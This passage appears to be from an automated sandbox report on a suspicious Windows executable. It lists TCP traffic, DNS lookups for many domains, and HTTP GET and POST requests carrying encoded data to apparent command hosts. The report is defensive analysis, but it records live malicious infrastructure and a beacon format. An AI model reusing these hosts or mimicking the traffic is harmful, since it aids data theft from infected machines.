                                                                                                                                Oct 29, 2024 16:56:47.739536047 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:47.746067047 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:47.754036903 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:47.759387970 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:48.637900114 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:48.679632902 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:48.996860027 CET804975095.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:48.996908903 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:49.257884026 CET4975080192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.276906013 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.282896042 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:50.283149004 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.294167042 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:50.299797058 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:50.301140070 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:51.149471998 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:51.195272923 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:51.490839005 CET804975195.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:51.490910053 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:51.805619001 CET4975180192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.825340986 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.831634998 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:52.831712008 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.841475964 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:52.847517967 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:53.693489075 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:53.746162891 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.036295891 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:54.038182020 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.042052031 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.354063034 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:54.367847919 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:54.372397900 CET804975295.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:54.372525930 CET4975280192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:59.075855970 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:56:59.081410885 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:59.081470966 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:56:59.095247030 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:56:59.100819111 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:59.775088072 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:59.782059908 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:00.604067087 CET4975380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:00.609637022 CET80497533.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:01.622029066 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:01.627538919 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:01.627619028 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:01.641539097 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:01.646995068 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:02.256103039 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:02.256336927 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:03.148575068 CET4975480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:03.154359102 CET80497543.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.172920942 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:04.178350925 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.179476023 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:04.194065094 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:04.199438095 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.199506044 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.836977959 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:04.837034941 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:05.695575953 CET4975580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:05.701061010 CET80497553.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:06.714827061 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:06.720834017 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:06.720911980 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:06.729289055 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:06.735023975 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:07.339656115 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:07.382806063 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:07.674649000 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:07.674763918 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:07.675853968 CET4975680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:57:07.681706905 CET80497563.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:13.090087891 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:13.095655918 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:13.095705032 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:13.112205982 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:13.118231058 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:14.102221966 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:14.148436069 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:14.298613071 CET804975738.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:14.298688889 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:14.617278099 CET4975780192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.637552023 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.643013954 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:15.643120050 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.656974077 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:15.662549019 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:16.606427908 CET804975838.47.233.52192.168.2.8
                                                                                                                                Oct 29, 2024 16:57:16.650077105 CET4975880192.168.2.838.47.233.52
                                                                                                                                Oct 29, 2024 16:57:16.868071079 CET804975838.47.233.52192.168.2.8
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 16:54:07.427656889 CET | 192.168.2.8 | 1.1.1.1 | 0xc0ac | Standard query (0) | www.dpo-medicina.online | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:54:23.839576960 CET | 192.168.2.8 | 1.1.1.1 | 0x76e8 | Standard query (0) | www.gold-rates.online | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:54:37.761424065 CET | 192.168.2.8 | 1.1.1.1 | 0x7424 | Standard query (0) | www.loginov.enterprises | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:54:51.684420109 CET | 192.168.2.8 | 1.1.1.1 | 0xcb6d | Standard query (0) | www.2925588.com | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:06.121714115 CET | 192.168.2.8 | 1.1.1.1 | 0xc0cc | Standard query (0) | www.treatyourownhip.online | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:20.071427107 CET | 192.168.2.8 | 1.1.1.1 | 0x6820 | Standard query (0) | www.premium303max.rest | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:33.855431080 CET | 192.168.2.8 | 1.1.1.1 | 0x4699 | Standard query (0) | www.adsdomain-195.click | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:48.262214899 CET | 192.168.2.8 | 1.1.1.1 | 0x6986 | Standard query (0) | www.broork.sbs | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:02.504802942 CET | 192.168.2.8 | 1.1.1.1 | 0x863f | Standard query (0) | www.nutrigenfit.online | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:16.420123100 CET | 192.168.2.8 | 1.1.1.1 | 0xa98e | Standard query (0) | www.plyvik.info | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:30.214814901 CET | 192.168.2.8 | 1.1.1.1 | 0x3280 | Standard query (0) | www.68529.xyz | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:45.028891087 CET | 192.168.2.8 | 1.1.1.1 | 0xd0ed | Standard query (0) | www.bulbulun.net | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:59.059731960 CET | 192.168.2.8 | 1.1.1.1 | 0xbe50 | Standard query (0) | www.smithsmobilewash.net | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:57:12.683146954 CET | 192.168.2.8 | 1.1.1.1 | 0xaab6 | Standard query (0) | www.2q33e.top | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:57:26.951071978 CET | 192.168.2.8 | 1.1.1.1 | 0x7716 | Standard query (0) | www.tangible.online | A (IP address) | IN (0x0001) | false
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 16:54:07.729743958 CET | 1.1.1.1 | 192.168.2.8 | 0xc0ac | No error (0) | www.dpo-medicina.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:54:23.967005014 CET | 1.1.1.1 | 192.168.2.8 | 0x76e8 | No error (0) | www.gold-rates.online | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:54:37.869055986 CET | 1.1.1.1 | 192.168.2.8 | 0x7424 | No error (0) | www.loginov.enterprises | loginov.enterprises | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 16:54:37.869055986 CET | 1.1.1.1 | 192.168.2.8 | 0x7424 | No error (0) | loginov.enterprises | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:54:37.869055986 CET | 1.1.1.1 | 192.168.2.8 | 0x7424 | No error (0) | loginov.enterprises | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:54:51.699052095 CET | 1.1.1.1 | 192.168.2.8 | 0xcb6d | No error (0) | www.2925588.com | | 103.71.154.12 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:06.140666008 CET | 1.1.1.1 | 192.168.2.8 | 0xc0cc | No error (0) | www.treatyourownhip.online | treatyourownhip.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 16:55:06.140666008 CET | 1.1.1.1 | 192.168.2.8 | 0xc0cc | No error (0) | treatyourownhip.online | | 81.169.145.95 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:20.140212059 CET | 1.1.1.1 | 192.168.2.8 | 0x6820 | No error (0) | www.premium303max.rest | | 45.79.252.94 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:33.927226067 CET | 1.1.1.1 | 192.168.2.8 | 0x4699 | No error (0) | www.adsdomain-195.click | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:55:48.794226885 CET | 1.1.1.1 | 192.168.2.8 | 0x6986 | No error (0) | www.broork.sbs | | 163.44.176.12 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:02.568098068 CET | 1.1.1.1 | 192.168.2.8 | 0x863f | No error (0) | www.nutrigenfit.online | nutrigenfit.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 16:56:02.568098068 CET | 1.1.1.1 | 192.168.2.8 | 0x863f | No error (0) | nutrigenfit.online | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:16.444863081 CET | 1.1.1.1 | 192.168.2.8 | 0xa98e | No error (0) | www.plyvik.info | | 67.223.117.142 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:30.644201994 CET | 1.1.1.1 | 192.168.2.8 | 0x3280 | No error (0) | www.68529.xyz | | 107.163.130.253 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:45.176309109 CET | 1.1.1.1 | 192.168.2.8 | 0xd0ed | No error (0) | www.bulbulun.net | | 95.216.25.89 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:59.072967052 CET | 1.1.1.1 | 192.168.2.8 | 0xbe50 | No error (0) | www.smithsmobilewash.net | smithsmobilewash.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 16:56:59.072967052 CET | 1.1.1.1 | 192.168.2.8 | 0xbe50 | No error (0) | smithsmobilewash.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:56:59.072967052 CET | 1.1.1.1 | 192.168.2.8 | 0xbe50 | No error (0) | smithsmobilewash.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:57:13.086227894 CET | 1.1.1.1 | 192.168.2.8 | 0xaab6 | No error (0) | www.2q33e.top | 2q33e.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 29, 2024 16:57:13.086227894 CET | 1.1.1.1 | 192.168.2.8 | 0xaab6 | No error (0) | 2q33e.top | | 38.47.233.52 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:57:26.971343994 CET | 1.1.1.1 | 192.168.2.8 | 0x7716 | No error (0) | www.tangible.online | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 16:57:26.971343994 CET | 1.1.1.1 | 192.168.2.8 | 0x7716 | No error (0) | www.tangible.online | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
HTTP session

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 194.58.112.174 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:54:07.750056028 CET | 434 | OUT | GET /hzvv/?mRR=Vxudf0fHzLw84n3P&edD=rORncVVdvgzWlpxqVdy6wyOp/+Tf7AwoM18MThSKdmZP0ohcmrwEBuX8zFjiIhpadHd1pz5OrNzpltMAb4bxQj9ydLcasKlfpoifhU3jpBZMJYPNfPfapl2Jiho/Qt0KOg== HTTP/1.1
    Host: www.dpo-medicina.online
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Oct 29, 2024 16:54:08.641187906 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 29 Oct 2024 15:54:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
                                                                                                                                Data Raw: 32 35 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                                                                                                                Data Ascii: 2517<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.dpo-medicina.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:54:08.641231060 CET212INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                                                                                                                                Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.dpo-medici
                                                                                                                                Oct 29, 2024 16:54:08.641246080 CET | 1236 | IN | Data Raw: 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 68 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0
                                                                                                                                Data Ascii: na.online</h1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_referenc
                                                                                                                                Oct 29, 2024 16:54:08.641261101 CET | 1236 | IN | Data Raw: 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f
                                                                                                                                Data Ascii: ing__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none">
                                                                                                                                Oct 29, 2024 16:54:08.641284943 CET | 1236 | IN | Data Raw: 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c
                                                                                                                                Data Ascii: on_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="
                                                                                                                                Oct 29, 2024 16:54:08.641299009 CET | 1236 | IN | Data Raw: 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62
                                                                                                                                Data Ascii: -title_size_large-compact"> </strong><p class="b-text b-parking__promo-description"> &nbsp; &nbsp; </p><a
                                                                                                                                Oct 29, 2024 16:54:08.641314983 CET | 1236 | IN | Data Raw: 6d 40 64 65 73 6b 74 6f 70 20 6c 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 6e 65 40 64 65 73 6b 74 6f 70 22 3e d0 a3 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 b8 d1 82 d0 b5 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d1 8b d0 b9 20
                                                                                                                                Data Ascii: m@desktop l-margin_bottom-none@desktop"> SSL- &nbsp; &nbsp;! , &nbsp;
                                                                                                                                Oct 29, 2024 16:54:08.641329050 CET | 1236 | IN | Data Raw: 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 65 61 64 20 20 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                                                                                Data Ascii: ript = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand=' + Math.random() + '&callback
                                                                                                                                Oct 29, 2024 16:54:08.641345978 CET | 794 | IN | Data Raw: 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69
                                                                                                                                Data Ascii: }</script><!-- Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (d


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                1 | 192.168.2.8 | 49709 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:23.986207008 CET | 693 | OUT | POST /026w/ HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.gold-rates.online
                                                                                                                                Referer: http://www.gold-rates.online/026w/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 31 72 39 4c 47 67 42 54 66 37 43 47 55 6c 7a 55 47 37 6a 6a 37 73 79 4b 6d 32 46 4f 68 4e 75 7a 6e 54 50 44 62 36 52 38 62 6f 32 48 47 63 75 4e 72 32 58 51 69 33 2b 4a 68 54 6f 41 41 6d 4a 6d 6e 64 64 58 41 38 63 65 62 6f 65 61 41 50 6f 46 34 55 66 43 63 79 36 30 6e 35 6e 31 77 78 42 56 54 4f 51 57 6f 6e 38 4f 6f 43 67 52 78 6a 6c 56 41 70 53 4b 50 55 6f 66 6a 62 75 4a 37 54 43 55 75 68 54 4b 57 55 7a 4f 52 6c 57 74 6b 59 5a 42 57 57 36 43 77 74 2b 45 62 6b 65 46 66 71 5a 59 2b 76 36 55 6c 75 4f 47 64 48 36 58 2f 41 4e 49 58 4f 4d 6e 79 36 44 75 71 63 34 3d
                                                                                                                                Data Ascii: edD=oaImfau1/9zZ1r9LGgBTf7CGUlzUG7jj7syKm2FOhNuznTPDb6R8bo2HGcuNr2XQi3+JhToAAmJmnddXA8ceboeaAPoF4UfCcy60n5n1wxBVTOQWon8OoCgRxjlVApSKPUofjbuJ7TCUuhTKWUzORlWtkYZBWW6Cwt+EbkeFfqZY+v6UluOGdH6X/ANIXOMny6Duqc4=
                                                                                                                                Oct 29, 2024 16:54:24.627417088 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:23 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1138
                                                                                                                                x-request-id: 4e80aa95-fbc9-4637-83ba-4eb199ac806b
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==
                                                                                                                                set-cookie: parking_session=4e80aa95-fbc9-4637-83ba-4eb199ac806b; expires=Tue, 29 Oct 2024 16:09:24 GMT; path=/
                                                                                                                                connection: close
